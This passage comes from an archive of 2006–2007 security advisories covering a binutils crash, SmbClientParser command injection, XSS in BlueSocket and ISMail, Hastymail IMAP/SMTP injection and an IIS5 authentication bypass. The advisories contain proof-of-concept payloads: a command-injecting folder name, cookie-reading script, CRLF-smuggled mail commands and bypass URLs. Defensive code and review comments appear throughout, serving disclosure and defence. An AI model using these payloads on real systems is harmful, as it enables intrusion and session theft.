November 13, 2007: Last revision.
DISCLOSURE TIMELINE
February 27, 2006: The vulnerability discovered by Internet Security Auditors.
April 18, 2006: Initial vendor notification sent. No response
April 26, 2006: Second vendor notification sent. Ping pong responses.
September 14, 2006: Third vendor notification sent. No response.
December 01, 2006: Fourth vendor notification sent. No response.
December 04, 2006: New patch coming. No schedule.
January 02, 2007: Fifth vendor contact to ask for planning. No response.
January 22, 2007: Sixth vendor contact to ask for planning. Scheduled.
March 23, 2007: Seventh vendor contact to ask for planning. Re-Scheduled.
May 22, 2007: Eighth vendor contact to ask for planning. Re-Scheduled.
October 01, 2007: Ninth vendor contact to ask for planning. Patch will be published in October.
November 09, 2007: Tenth. Version 48.1.1 has been approved for general release and published.
November 13, 2007: Advisory Published.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-005: strings, dbg and other binutils commands are vulnerable to a Denial of Service.
Original release Date: April 16th, 2006
Last revised: April 26th, 2006
Discovered by: Jesús Olmos González
Severity: 2/5
BACKGROUND
strings and dbg are tools from the binutils package; they can be used to look for printable strings in a binary file and for debugging and reverse engineering of executables.
http://www.gnu.org/software/binutils/
DESCRIPTION
A binary file can be protected against the use of strings.
It is possible to build a binary file with some special characters in a variable so that, once compiled, it is impossible to extract the printable strings of the ELF with the strings tool: it will segfault or hang.
(gdb) r evil
Starting program: /usr/bin/strings evil
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Program received signal SIGSEGV, Segmentation fault.
0xb7e9ecbd in bfd_hash_lookup () from /usr/lib/libbfd-2.16.1.so
(gdb)
The problem is in bfd_hash_lookup from the libbfd-2.16.1.so library, at this snippet of code:
1fcb4: 31 c7 xor %eax,%edi
1fcb6: 89 f8 mov %edi,%eax
1fcb8: 8b 4d 08 mov 0x8(%ebp),%ecx
1fcbb: 31 d2 xor %edx,%edx
1fcbd: f7 71 04 divl 0x4(%ecx)
<--SIGSEGV with %253Cc%AAAAA%AAAAA%AAAAA%AAAAA%AAAAA%AAAAA
1fcc0: 01 d2 add %edx,%edx
1fcc2: 01 d2 add %edx,%edx
1fcc4: 89 55 e0 mov %edx,0xffffffe0(%ebp)
With %253Cc, ecx gets the value 0x54, and this address cannot be accessed.
It seems not to be exploitable, but it is under investigation.
All versions are affected.
PROOF OF CONCEPT
This evil file cannot be scanned with the strings command:
root@jolmos:/research# strings evil
Violacion de segmento
root@jolmos:/research# cat evil
%253Cc%253Cc%253Cc%253Cc%253Cc%253Cc%253Cc
root@jolmos:/research
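A defender who has to run strings over untrusted files can avoid the libbfd object-file path altogether. This is an added example, not binutils code: a pure-Python scanner that applies the same rule as strings (runs of printable bytes of a minimum length) directly to the raw bytes, plus a wrapper that runs the system strings under a timeout and falls back to the scanner when it exits on a signal or hangs. The -a flag passed to strings (scan the whole file rather than only the sections libbfd reports) and the sample bytes in the test are my additions.

```python
import string
import subprocess

# Added example, not binutils code. Printable ASCII plus space, the same
# notion of "printable" that strings uses for its default character set.
PRINTABLE = set(bytes(string.printable, "ascii")) - set(b"\t\n\r\x0b\x0c")


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of at least min_len printable bytes, as plain raw-byte scanning.
    No ELF header or symbol table is parsed, so the libbfd hash-table
    path that segfaults in the advisory is never exercised."""
    found, run = [], bytearray()
    for b in data:
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:          # run that reaches end of file
        found.append(run.decode("ascii"))
    return found


def strings_with_fallback(path: str, timeout: float = 10.0):
    """Run `strings -a` under a timeout. -a scans the whole file instead of
    only the sections libbfd identifies. A negative return code means the
    tool died on a signal (SIGSEGV is -11); a timeout covers the hang case.
    Either way, fall back to the pure-Python scanner and say which path ran."""
    try:
        proc = subprocess.run(["strings", "-a", path],
                              capture_output=True, timeout=timeout)
        if proc.returncode == 0:
            return proc.stdout.decode("ascii", "replace").splitlines(), "strings"
    except (subprocess.TimeoutExpired, FileNotFoundError):
        pass
    with open(path, "rb") as f:
        return extract_strings(f.read()), "fallback"
```

The fallback loses what libbfd adds (limiting output to loaded sections), so its output is noisier, but it is exactly the raw scan that `strings -a` performs and it cannot be crashed by a malformed section table.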
BUSINESS IMPACT
-
SYSTEMS AFFECTED
Tested on some Linux systems.
SOLUTION
There is a provisional patch at:
http://sourceware.org/bugzilla/attachment.cgi?id=978&action=view
REFERENCES
-
CREDITS
This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
April 18, 2006: Initial release.
April 26, 2006: The patch has been added at disclosure timeline.
DISCLOSURE TIMELINE
February 29, 2006 The vulnerability discovered by Internet Security Auditors (www.isecauditors.com)
April 18, 2006 Initial vendor notification sent (http://sourceware.org/bugzilla/show_bug.cgi?id=2584)
April 23, 2006 A provisional patch was published (http://sourceware.org/bugzilla/attachment.cgi?id=978&action=view)
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-006: SmbClientParser perl module allows remote command execution
Original release date: February 28, 2006
Last revised: July 18th, 2008
Discovered by: Jesus Olmos Gonzalez
Severity: 5/5
BACKGROUND
SmbClientParser is a useful Perl module for writing interactive NetBIOS code; it is a wrapper around the Linux smbclient command and can be downloaded from:
http://search.cpan.org/~alian/Filesys-SmbClientParser-2.7/SmbClientParser.pm
or installed:
perl -MCPAN -e shell
install Filesys::SmbClientParser
DESCRIPTION
If a host scans your shared folder with a tool that uses this module, you can execute shell commands on that host.
This module has the following snippet of code, in which pargs is parsed with the following poor filters:
    my $pargs;
    if ($args=~/^([^;]*)$/) { # no ';' nickel
        $pargs=$1;
    } elsif ($smbscript) { # ';' is allowed inside -c ' '
        if ($args=~/^([^;]* -c '[^']*'[^;]*)$/) {
            $pargs=$1;
        } else { # what that ?
            die("Why a ';' here ? => $args");
        }
    } else { die("Why a ';' here ? => $args"); }
If there is a folder inside a shared folder with the following name:
' x && xterm &#
Perl will spawn an xterm :)
Note that this was reported in 2006 and no answer was received; be careful with CPAN modules.
PROOF OF CONCEPT
This folder name inside the shared folder:
' x && xterm &#
will execute the following:
/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "' x && xterm &#"' -D "/poc"
This proof of concept spawns an xterm on the victim's X display; replace xterm with the evil commands.
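The command line above is only dangerous because a shell parses it. As an added example, not code from Filesys::SmbClientParser, the same invocation built as an argv list in Python: the folder name from the proof of concept travels as one argument, so &&, ;, # and the single quote are never interpreted, and only the two characters that smbclient's own -c parser cares about (the double quote and a line break) are rejected. The share, user and paths are constructed values, and the flags used are the ones visible in the proof of concept.

```python
import shlex
import subprocess

# Added example, not code from Filesys::SmbClientParser: the command line
# from the proof of concept built as an argv list, so no shell ever parses
# the share's folder names. Share, user and paths are constructed values.
UNSAFE_IN_NAME = set('"\r\n')


def is_safe_smb_name(name: str) -> bool:
    """smbclient's -c string delimits names with double quotes, and a line
    break ends a command, so neither can be represented inside a name.
    Reject rather than strip, so the caller learns the name is hostile."""
    return not (UNSAFE_IN_NAME & set(name))


def smbclient_argv(share, user, password, folder, workdir):
    """argv for: smbclient SHARE -U user%pass -d0 -c 'cd "FOLDER"' -D WORKDIR
    (the flags the module uses). Each list element is one argument, so
    '&&', ';', '#' and single quotes inside `folder` are passed literally."""
    for name in (folder, workdir):
        if not is_safe_smb_name(name):
            raise ValueError(f"unsafe characters in {name!r}")
    return ["/usr/bin/smbclient", share, "-U", f"{user}%{password}", "-d0",
            "-c", f'cd "{folder}"', "-D", workdir]


def as_shell_line(argv):
    """If a shell string is unavoidable, quote every argument: shlex.join
    produces a line that shlex.split turns back into the same argv."""
    return shlex.join(argv)


def round_trips(argv) -> bool:
    """True when the quoted shell line reproduces argv exactly."""
    return shlex.split(as_shell_line(argv)) == argv


def run(argv, timeout=60):
    """Execute without a shell; shell=True would reintroduce the injection."""
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
```

Note that -U user%pass places the password on the command line, where it is visible in process listings; that is how the module builds it and is kept here for fidelity, not as a recommendation.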
BUSINESS IMPACT
-
SYSTEMS AFFECTED
Versions up to and including 2.7 (all)
SOLUTION
Use this patch:
> #------------------------------------------------------------------------------
> # Sanitize (jolmos[@]isecauditors[.]com)
> #------------------------------------------------------------------------------
> sub Sanitize {
> my $danger = $_[0]; #There are many danger bytes, but if the
> $$danger =~ s/\n|\r|'|"|//ig; #danger string is inside "" or '' the only
> #option is break with ' or " or \r or \n
> }
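Review bot: in the Sanitize body, the substitution `s/\n|\r|'|"|//ig` ends with an empty alternative (the `|` right before the closing `/`), which matches the empty string at every position; with `/g` it is harmless, but it reads as a typo for `s/[\n\r'"]//g`, and the `i` flag has no effect on these characters. The routine also strips silently instead of failing, so a hostile name is quietly turned into a different name, and it leaves `$` and backtick alone even though the proof of concept shows arguments the module wraps in double quotes (`-D "/poc"`), where a shell expands both; the comment above the regex should state those limits, and handing smbclient an argument list instead of a shell string would remove the problem at its root.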
265a274
> foreach my $i (@_) { &Sanitize(\$i); }
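Review bot: `foreach my $i (@_) { &Sanitize(\$i); }` only works because `foreach` aliases `$i` to each element of `@_`, so `\$i` is a reference to the caller's own variable and Sanitize modifies it in place; that side effect deserves a comment at the insertion point, and since the same line is inserted at eleven call sites below, one call inside the routine that assembles the smbclient command line would be easier to keep consistent than eleven copies.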
287a297
> foreach my $i (@_) { &Sanitize(\$i); }
321a332
> foreach my $i (@_) { &Sanitize(\$i); }
331a343
> foreach my $i (@_) { &Sanitize(\$i); }
345a358
> foreach my $i (@_) { &Sanitize(\$i); }
359a373
> foreach my $i (@_) { &Sanitize(\$i); }
373a388
> foreach my $i (@_) { &Sanitize(\$i); }
375a391
>
387a404
> foreach my $i (@_) { &Sanitize(\$i); }
398a416
> foreach my $i (@_) { &Sanitize(\$i); }
409a428
> foreach my $i (@_) { &Sanitize(\$i); }
487a507
> foreach my $i (@_) { &Sanitize(\$i); }
REFERENCES
http://search.cpan.org/~alian/Filesys-SmbClientParser-2.7
CREDITS
This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
April 26, 2006: Initial release.
July 14, 2008: Patch added.
DISCLOSURE TIMELINE
February 26, 2006: The vulnerability discovered by Internet Security Auditors.
April 26, 2006: Initial vendor notification sent.
September 14, 2006: Second notification: correction in one week. No correction.
December 2, 2006: Third notification: no response.
January 18, 2007: Fourth notification: no response.
May 1, 2007: Fifth notification: no response.
November 11, 2007: Sixth notification: no response.
July 14, 2008: No response from the developer (Alain Barbet); we wrote the patch.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-007: The BlueSocket web administration is vulnerable to a Cross Site Scripting attack
Original release Date: April 27th, 2006
Last revised: December 1st, 2006
Discovered by: Jesús Olmos González
Severity: 2/5
BACKGROUND
BSC 2100 product is included in the Blue Secure Family (www.bluesocket.com).
BlueSecure Controllers provide high-performance, reliable, policy-based WLAN security and management solutions that have been deployed by hundreds of large institutions, enterprises, and public access providers.
DESCRIPTION
The admin.pl Perl code does not sanitize its inputs, so when it writes the username back into the input field, HTML and script code can be written back with it and executed by the browser.
This cross-site scripting is in the administration interface of the security product; it has been tested only on the BSC 2100.
It is possible to send a fake e-mail to the admin, spoofing the product's address, saying that the configuration is not OK and including the special link.
If the admin clicks the link and authenticates in an apparently normal interface, his credentials will be sent to the attacker.
Combined with good social engineering, this is a great risk.
PROOF OF CONCEPT
This PoC injects some HTML to modify the look and feel of the authentication page; an attacker could inject script code to send back the credentials:
https://host.domain.com/admin.pl?ad_name=%22%3E%3Ch1%3EXSS%20BUG%3C/h1%3...
BUSINESS IMPACT
Credentials could be stolen through social engineering attacks.
SYSTEMS AFFECTED
Versions prior to 5.2 or without 5.1.1-BluePatch
SOLUTION
Update to version 5.2 or apply 5.1.1-BluePatch
REFERENCES
Vulnerability item number 4484 in the Bluepatch V6 for 5.1.1.1 Release Notes.
CREDITS
This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
April 27, 2006: Initial vendor contact.
April 28, 2006: Vendor updates its near patch.
June 21, 2006: Publication of the patch.
September 16, 2006: Vendor confirms inclusion in referenced patch.
September 17, 2006: Advisory revised.
DISCLOSURE TIMELINE
April 26, 2006: The vulnerability discovered by Internet Security Auditors (www.isecauditors.com).
December 1, 2006: Advisory finally Published
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-010: XSS vulnerability in error page of ISMail
Original release date: September 28, 2006
Last revised: December 1, 2006
Discovered by: Vicente Aguilera Díaz
Severity: 3/5
BACKGROUND
ISMail is a webmail system. Programmed in HTML and PHP, it is designed to work with any imap server.
ISMail requires PHP 4.2+, compiled with IMAP and Session support, installed on the server that runs it.
You have a choice of data-store backends (xml, encrypted xml, mysql, and postgresql are included, each requiring their respective PHP modules), and miscellaneous other options that can make the Inside Systems Mail experience a little friendlier.
Unlike most other webmail programs, Inside Systems Mail is both quick and easy to use. The layout, complete with address book and folder options, is simple and familiar to most users.
For administrators, the data-stores and options are easily extensible so that Inside Systems Mail can be dropped in nearly any configuration with minimal extra coding.
DESCRIPTION
The error page "error.php" receives a parameter in the query string that holds the error message to show.
This parameter ("error") can be manipulated by an attacker to inject arbitrary script/HTML code.
This is dangerous because XSS attacks can be used to obtain the session cookies of authenticated users and hijack their sessions, or to deface the error page.
PROOF OF CONCEPT
Example of XSS attack:
?error=XSS%20attack%3Cscript%3Ealert(document.cookie);%3C/script%3E
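The three reflected cross-site scripting advisories on this page (2006-004 vtls.web.gateway, 2006-007 BlueSocket admin.pl and 2006-010 ISMail error.php) share one root cause: a request parameter is written into the response as markup. As an added example, not code from any of those products, here is the reflection rendered raw beside the same value rendered through html.escape, for both contexts the advisories show: a text context (the ISMail error message) and an attribute context (the vtls and BlueSocket payloads, which start with "> to close the attribute). The payloads are the ones from the proofs of concept, URL-decoded; the surrounding HTML is constructed.

```python
from html import escape
from urllib.parse import unquote

# Added example, not code from ISMail, vtls or BlueSocket: the reflected
# value rendered raw, beside the same value rendered through html.escape.
# The two payloads are the ones from the proofs of concept, URL-decoded.
ERROR_PAYLOAD = unquote("XSS%20attack%3Cscript%3Ealert(document.cookie);%3C/script%3E")
ATTR_PAYLOAD = unquote("%22%3E%3Ch1%3E%3Cmarquee%3EXSS%20bug%3C/marquee%3E%3C/h1%3E%3C!--")


def render_error_unsafe(error: str) -> str:
    """error.php-style reflection: the parameter becomes markup."""
    return f'<p class="error">{error}</p>'


def render_error_safe(error: str) -> str:
    """Text context: <, >, & and quotes become entities, so the browser
    displays the payload instead of executing it."""
    return f'<p class="error">{escape(error, quote=True)}</p>'


def render_field_unsafe(value: str) -> str:
    """The vtls/BlueSocket shape: a value echoed into an attribute."""
    return f'<input type="text" name="ad_name" value="{value}">'


def render_field_safe(value: str) -> str:
    """Attribute context: quote=True is what keeps '"' from closing the
    attribute and starting new elements after it."""
    return f'<input type="text" name="ad_name" value="{escape(value, quote=True)}">'


def contains_active_markup(html: str) -> bool:
    """Coarse check: does the output contain a tag or an attribute break
    that came from the reflected value?"""
    lower = html.lower()
    return "<script" in lower or "<marquee" in lower or '"><' in lower
```

Escaping is context-specific: the same escape function is enough for text and quoted attributes, but a value placed inside a script block or a URL needs a different encoder, which is why frameworks tie the encoding to the output location rather than to the input.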
BUSINESS IMPACT
An attacker can hijack the session of other authenticated users, gaining access to their mail, or deface the error page.
SYSTEMS AFFECTED
This vulnerability has been tested on the latest version of ISMail (2.0, released on 2005-01-20).
Possibly all versions are affected by this vulnerability.
SOLUTION
Update to the version in the repository.
REFERENCES
http://www.insidesystems.net/projects/project.php?projectid=4
CREDITS
This vulnerability has been discovered and reported by
Vicente Aguilera Díaz (vaguilera (at) isecauditors (dot) com).
REVISION HISTORY
September 28, 2006: Initial release.
DISCLOSURE TIMELINE
September 27, 2006 The vulnerability discovered by Internet Security Auditors (www.isecauditors.com).
September 28, 2006 Initial vendor notification sent.
October 1, 2006 The vendor fixed the vulnerability in the repository.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-011: IMAP/SMTP Injection in Hastymail
Original release date: September 28, 2006
Last revised: December 1, 2006
Discovered by: Vicente Aguilera Díaz
Severity: 3/5
BACKGROUND
Hastymail is yet another webmail IMAP client written in PHP. Hastymail is designed for speed, RFC compatibility, simplicity, and security. Our goal is to create a simple interface with powerful but easy to use options that make managing your IMAP account effective and fast.
Hastymail is NOT groupware. We are focused on being a functional and fast webmail client.
The product homepage is http://hastymail.sourceforge.net/
DESCRIPTION
Hastymail provides a graphical interface to interact with mail servers across the IMAP/SMTP protocols.
Improper validation of the commands and data that Hastymail transmits to the mail servers during normal use of the application (for example, accessing the mailbox) allows an authenticated malicious user to inject arbitrary IMAP/SMTP commands into the mail servers used by Hastymail, through the parameters the webmail front-end uses in its communication with these mail servers.
This becomes dangerous because the injection of these commands allows an intruder to evade restrictions imposed at the application level and to exploit vulnerabilities that may exist in the mail servers through IMAP/SMTP commands.
PROOF OF CONCEPT
== IMAP Injection example (1.5 version) =============
Hastymail Vulnerable parameter: "mailbox" (and possibly others)
When a user accesses a folder (for example, "INBOX"), the browser sends a GET request such as:
?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX
A malicious user can modify the value of the "mailbox" parameter and inject any IMAP command.
The IMAP command injection has the following structure:
?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0a<ID>%20 \
<INJECT_IMAP_COMMAND_HERE>%0D%0A<ID>%20SELECT%20%2522INBOX
Note that double URL encoding is used to encode the quote character (").
Example:
Injection of the CREATE IMAP command across the "mailbox" parameter:
?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX \
%2522%0d%0aA0003%20CREATE%2522INBOX.vad
== SMTP Injection example (1.5 version) =============
Hastymail Vulnerable parameter: "subject" (and possibly others)
When a user sends a message, the browser sends a POST request like:
...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
-----------------------------84060780712450133071594948441
...
A malicious user can modify the value of the "subject" parameter and inject any SMTP command.
Example: Relay from a non-existent e-mail address.
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
.
mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in Hastymail
.
-----------------------------84060780712450133071594948441
...
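Both IMAP injections on this page (the Hastymail "mailbox" one above and the SquirrelMail "passed_id" one in advisory 2006-002) leave the same trace in a web server access log: a parameter that, once decoded, contains a carriage return and line feed. The Hastymail note about double URL encoding matters for detection, because a single decode pass leaves %22 in place and a naive filter on the quote character misses it. The following is an added example, not code from either project or from any log tool: a scanner over constructed Apache-style access-log lines that decodes each query parameter repeatedly until it stops changing and reports parameters that reveal a CR/LF, together with whether more than one decoding layer was present. The log lines carry the payloads shown in the two proofs of concept; the client addresses, timestamps and sizes are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (not from the advisories): two ordinary
# folder views and the two injection shapes shown in the Hastymail and
# SquirrelMail proofs of concept.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Sep/2006:10:01:02 +0200] "GET /?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX HTTP/1.1" 200 5120
10.0.0.5 - - [28/Sep/2006:10:01:09 +0200] "GET /?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0aA0003%20CREATE%2522INBOX.vad HTTP/1.1" 200 5120
10.0.0.7 - - [28/Sep/2006:10:02:15 +0200] "GET /src/read_body.php?mailbox=INBOX&passed_id=1%20BODY[1]%0D%0AZ900%20CAPABILITY%0D%0AZ901%20CAPABILITY%0D%0AZ902%20FETCH%201&startMessage=1&show_more=0 HTTP/1.1" 200 2048
10.0.0.9 - - [28/Sep/2006:10:03:00 +0200] "GET /?id=47fc54216aae12d57570c9703abe1b7d&mailbox=Sent HTTP/1.1" 200 4096
"""

# Common log format: client, ident, user, [time], "METHOD target PROTO" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')


def decode_layers(value: str, max_rounds: int = 3):
    """URL-decode repeatedly until the value stops changing.
    Returns (fully_decoded, layers), where layers counts the rounds that
    changed the value; 2 or more means the value was double encoded."""
    layers, current = 0, value
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        layers += 1
        current = decoded
    return current, layers


def scan_line(line: str):
    """(client, parameter, double_encoded) for every parameter whose
    decoded value contains a line break; an empty list for clean lines."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    for pair in urlsplit(m.group("target")).query.split("&"):
        name, _, raw = pair.partition("=")
        value, layers = decode_layers(raw)
        if "\r" in value or "\n" in value:
            findings.append((m.group("ip"), name, layers >= 2))
    return findings


def scan_log(text: str):
    """Run scan_line over a whole log and flatten the findings."""
    return [f for line in text.splitlines() for f in scan_line(line)]
```

The decode loop is bounded on purpose: a value that keeps changing after three rounds is itself suspicious, and an unbounded loop would be a denial-of-service vector against the scanner.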
BUSINESS IMPACT
The IMAP/SMTP command injection allows exploiting vulnerabilities in the IMAP/SMTP servers and evading all restrictions at the application layer.
SYSTEMS AFFECTED
This vulnerability has been tested in:
SOLUTION
Apply the patch: http://hastymail.sourceforge.net/security.php
REFERENCES
http://hastymail.sourceforge.net/security.php
CREDITS
This vulnerability has been discovered and reported by
Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).
REVISION HISTORY
September 28, 2006: Initial release.
October 3, 2006: Project admin response.
October 9, 2006: Project admin publishes the patch for versions 1.5 and 1.02.
DISCLOSURE TIMELINE
September 28, 2006: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
December 1, 2006: Advisory published.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-013: Microsoft IIS5 NTLM and Basic authentication bypass
Original release date: December 15, 2006
Last revised: May 22, 2007
Discovered by: Jesus Olmos Gonzalez
Severity: 5/5
BACKGROUND
Microsoft Internet Information Server can protect private content with Basic or NTLM authentication.
Many web pages, intranets and extranets rely on Microsoft security.
IIS 5 has a "Hit-highlighting" functionality that opens a site object and highlights part of it; it had a traversal vulnerability in the past. Now it can be used to bypass IIS authentication.
This is poorly documented in the Knowledge Base at http://support.microsoft.com/kb/328832; the real impact is detailed below.
DESCRIPTION
Any Internet user can access the private web directories and files of any IIS 5 site by highlighting them with "Hit-highlighting". To use this functionality the user supplies the CiWebhitsfile parameter to the null.htw object.
The null.htw object has to be accessed from a non-existent directory, for example http://anyiisweb.com/foo/null.htw
It is possible to use null.htw or other object specified at the CiTemplate template.
PROOF OF CONCEPT
https://anyiis5.com/authBypass/null.htw?CiWebhitsfile=/protectedfile.asp...
https://anyiis5.com/authBypass/null.htw?CiWebhitsfile=/some/secretfile.t...
BUSINESS IMPACT
The impact depends on the web contents. Attackers could gain access to all protected documents, and ASP code.
When an attacker accesses a trusted zone, the probability of getting command execution is higher.
SYSTEMS AFFECTED
Internet Information Services Version 5, any Service Pack.
SOLUTION
Protect the files with NTFS filesystem permissions instead of relying on the IIS protection.
Microsoft recommends not to use IISv5.
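Until the files are protected at the NTFS level, the bypass is at least easy to see in the web server logs, because every such request names a .htw object and carries the protected path in CiWebhitsfile. The following is an added example, not Microsoft code or a product feature: a parser for IIS W3C extended log lines driven by the #Fields header, and a check that reports .htw requests whose CiWebhitsfile points under a path the site expects IIS authentication to guard. The log lines, client addresses and PROTECTED_PREFIXES are constructed for the example; the request shapes follow the proof of concept.

```python
# Added example, not Microsoft code: detection over constructed IIS 5 W3C
# extended log lines. PROTECTED_PREFIXES is an assumed site policy naming
# the paths that IIS authentication is supposed to guard.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2006-12-15 10:00:01 203.0.113.7 GET /index.asp - 200
2006-12-15 10:00:05 203.0.113.7 GET /authBypass/null.htw CiWebhitsfile=/protectedfile.asp 200
2006-12-15 10:00:09 203.0.113.9 GET /protected/secret.txt - 401
2006-12-15 10:00:12 203.0.113.9 GET /foo/null.htw CiWebhitsfile=/protected/secret.txt 200
2006-12-15 10:00:20 203.0.113.4 GET /search/query.htw CiWebhitsfile=/public/faq.txt 200
"""

PROTECTED_PREFIXES = ("/protected/", "/protectedfile.asp")


def parse_w3c(text: str):
    """Yield one dict per record, naming columns from the #Fields header
    so the check does not depend on a fixed column order."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            yield dict(zip(fields, line.split()))


def hit_highlight_target(record: dict):
    """The CiWebhitsfile value of a .htw request, or None for anything else.
    The stem is matched on its extension, not on whether the directory
    exists, since the advisory shows the object under a made-up directory."""
    if not record.get("cs-uri-stem", "").lower().endswith(".htw"):
        return None
    for pair in record.get("cs-uri-query", "-").split("&"):
        name, _, value = pair.partition("=")
        if name.lower() == "ciwebhitsfile":
            return value
    return None


def find_bypass_attempts(text: str):
    """(client, stem, target, status) for .htw requests whose CiWebhitsfile
    points under a protected path. A 200 status on such a request, while
    the direct request to the same file gets a 401, is the tell."""
    hits = []
    for rec in parse_w3c(text):
        target = hit_highlight_target(rec)
        if target and target.lower().startswith(PROTECTED_PREFIXES):
            hits.append((rec["c-ip"], rec["cs-uri-stem"], target, rec["sc-status"]))
    return hits
```

Matching on the extension rather than on the literal name null.htw follows the advisory's remark that any object named in the CiTemplate template can be used, so a rule keyed only on null.htw would miss variants.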
REFERENCES
http://support.microsoft.com/kb/328832
CREDITS
This vulnerability has been discovered and reported
by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com)
REVISION HISTORY
December 15, 2006: Initial release
March 19, 2007: Latest revision
March 27, 2007: First notification to the vendor. Response: under revision.
April 11, 2007: The vendor considers small changes to its KB article.
April 12, 2007: We accept it and propose adding comments about the severity of the problem. Rejected.
May 21, 2007: Published, as the vendor information is not detailed enough.
DISCLOSURE TIMELINE
December 15, 2006: Vulnerability acquired by
Jesus Olmos Gonzalez (Internet Security Auditors)
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.